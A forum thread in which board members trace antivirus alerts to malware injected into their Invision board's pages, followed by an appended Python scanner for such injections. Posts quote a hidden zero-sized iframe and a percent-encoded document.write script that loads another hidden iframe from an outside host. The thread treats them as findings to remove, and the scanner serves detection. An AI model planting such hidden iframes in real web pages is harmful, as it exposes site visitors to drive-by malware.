Webshield alert!! Toontastic is a danger to your computer.


Park Life

Yep - I've seen the thread over at N-O too....

 

Not experienced it myself but there's enough of you reporting stuff to know it's not isolated. My initial instincts are that it's something to do with the server - going to need to run this one past Pud I'm afraid...

 

 

Reaction time 48hrs. :lol:

 

Wrong

Link to comment
Share on other sites

yeah i'm right

 

you've an iframe loading on pages

 

<iframe src="http://evesteam.net/dl/un/index.php" frameborder=0 width=0 height=0></iframe>

 

 

just need to upgrade your Invision board or apply the patch i guess there was one released about 6-7 months ago for 2.3.5 and under

and code for loading the iframe is probably held in the script/page containing the footer info for the copyright and all that shite

 

 

Thanks for that one Ant. I'm having to wrack my brains but I do seem to recall we had something similar in the early days on this board. What I had to do back then was download the entire code, run a grep to find the weblinks (i.e. evestream.net) and remove it. Upload the modded files and hey presto, all OK.

 

I suspect this is tied in with the spam we've been getting and no doubt what has happened is that someone has clicked one of the links which has set the worm off.

 

Cunts aren't they?

Link to comment
Share on other sites

Thanks to Ant, I've found the spurious web link and removed it. Parky (et al) can you please test and advise?

 

Safari back to normal.

 

Will let you know pc/vista/avg a bit later.

 

Thank you. :lol:

Link to comment
Share on other sites

Might be worth doing the upgrade anyway - just to be safe. Sounds like we were lucky this time

 

I know I'm volunteering Craig / Peter / someone for some work - but I don't mind helping out myself if needed.

 

We could suspend posting for an hour or two whilst the upgrade happens?

Link to comment
Share on other sites

doubt it would even take an hour or two, upgrades on these sorts of forums tend to be fairly quick and painless changes aren't normally in the files where your settings are stored, or they get merged in with a script etc, and going from 2.3.1> .6 at a guess i'd say would be changing a lot of files you don't tend to go anywhere near

 

at worst prob just a matter of suspending for 20mins and uploading maybe a mb of files over the older ones.. minus your style/theme settings if you even have to worry about that.

 

whether pp etc need a new/renewed license for the new version i don't know and they can be pricey pending on which is required

 

I'm sure that's how long it would take. I was suggesting an hour to allow for the inevitable fuck up. Also, it would allow time to export content, import on a local machine (after screening the sql dump for the injected code) to a clean version of the board software, test it's worked and then replace the version on the live domain. That way, the compromised version is removed completely.

Link to comment
Share on other sites

Fingers crossed it's gone again...

 

and even bigger fingers crossed, it won't be coming back. If it does this time, I seriously haven't got a clue.

Link to comment
Share on other sites

Yep - I've eradicated the problem, that's why :lol:

 

No-one's getting it now.

 

Hate to be a kill joy but i still am unfortunately. It's not the end of the world for me, i'm naive to it all i just tend to click ignore but thought i'd let you know the problem is still around.

Link to comment
Share on other sites

Yep - I've eradicated the problem, that's why :lol:

 

No-one's getting it now.

 

I beg to differ I'm afraid, although I haven't cleared out my cache yet. That said, I wasn't getting it yesterday and am today so fairly certain no amount of cache clearing will make any difference.

Link to comment
Share on other sites

Hmmmm - i found this embedded in the board header/footer wrapper.....

 

<script type="text/javascript">
document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%74%72%61%66%6D%2E%63%6E%2F%64%6C%6C%2F%67%6F%2E%70%68%70%3F%73%69%64%3D%31%22%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%30%20%77%69%64%74%68%3D%30%20%68%65%69%67%68%74%3D%30%3E%3C%2F%69%66%72%61%6D%65%3E'));
</script>

 

I haven't got a scooby and what concerns me more is I've locked down those files for edit so I can't understand how they've been changed. I've deleted this shit so hopefully it'll be behaving once more for you guys.

 

BTW - if anyone has any ideas as to what the fuck that code is all about, I'd be grateful.

Link to comment
Share on other sites
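Added example, not part of the original thread or of the board software: a Python scanner for the two injection forms quoted above, the plain zero-sized iframe and the same tag hidden inside a `document.write(unescape('%..'))` literal, usable for the grep over downloaded board files and the SQL-dump screening the posters describe. The sample wrapper, its `example.invalid` hosts and all function names are constructed for this example.

```python
import re
from pathlib import Path
from urllib.parse import unquote

IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.I)
# width=0 or height=0, quoted or not: the frame renders invisibly
ZERO_DIM_RE = re.compile(r"\b(?:width|height)\s*=\s*[\"']?0(?:px)?[\"']?(?=[\s>/])", re.I)
SRC_RE = re.compile(r"\bsrc\s*=\s*[\"']?([^\"'\s>]+)", re.I)
# String literal handed to JavaScript unescape(), e.g. document.write(unescape('%3C...'))
UNESCAPE_RE = re.compile(r"unescape\(\s*(['\"])([^'\"]*)\1\s*\)", re.I)

def hidden_iframes(text):
    """Return the src of every iframe tag that has a zero width or height."""
    found = []
    for tag in IFRAME_RE.findall(text):
        if ZERO_DIM_RE.search(tag):
            m = SRC_RE.search(tag)
            found.append(m.group(1) if m else "")
    return found

def scan(text, depth=3):
    """Return (kind, src) pairs, decoding unescape() literals and rescanning them."""
    findings = [("iframe", src) for src in hidden_iframes(text)]
    for m in UNESCAPE_RE.finditer(text):
        # %XX maps to one character, as in JS unescape(); %uXXXX is not handled
        decoded = unquote(m.group(2), encoding="latin-1")
        if depth > 0:
            findings += [("unescape>" + k, s) for k, s in scan(decoded, depth - 1)]
    return findings

def scan_tree(root):
    """Scan every file under root (templates, skins, an SQL dump); keep only hits."""
    files = (p for p in Path(root).rglob("*") if p.is_file())
    return {str(p): f for p in files if (f := scan(p.read_text(errors="replace")))}

def percent_encode_all(s):
    """Build constructed test data: encode every character as %XX."""
    return "".join("%%%02X" % ord(c) for c in s)

# Constructed sample of a board footer wrapper: two injected frames, one legitimate
SAMPLE_WRAPPER = (
    "<div id='footer'>Powered by board software</div>\n"
    '<iframe src="http://plain.example.invalid/index.php" frameborder=0 width=0 height=0></iframe>\n'
    "<script type=\"text/javascript\">document.write(unescape('"
    + percent_encode_all('<iframe src="http://hidden.example.invalid/go.php" width=0 height=0></iframe>')
    + "'));</script>\n"
    '<iframe src="/embed/video" width="560" height="315"></iframe>\n'
)

if __name__ == "__main__":
    for kind, src in scan(SAMPLE_WRAPPER):
        print(kind, src)
```

A hit in a file that was supposedly locked for edit means the scan should also cover the database-stored skin or wrapper content, which is why `scan_tree` reads any file type, including an exported SQL dump.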
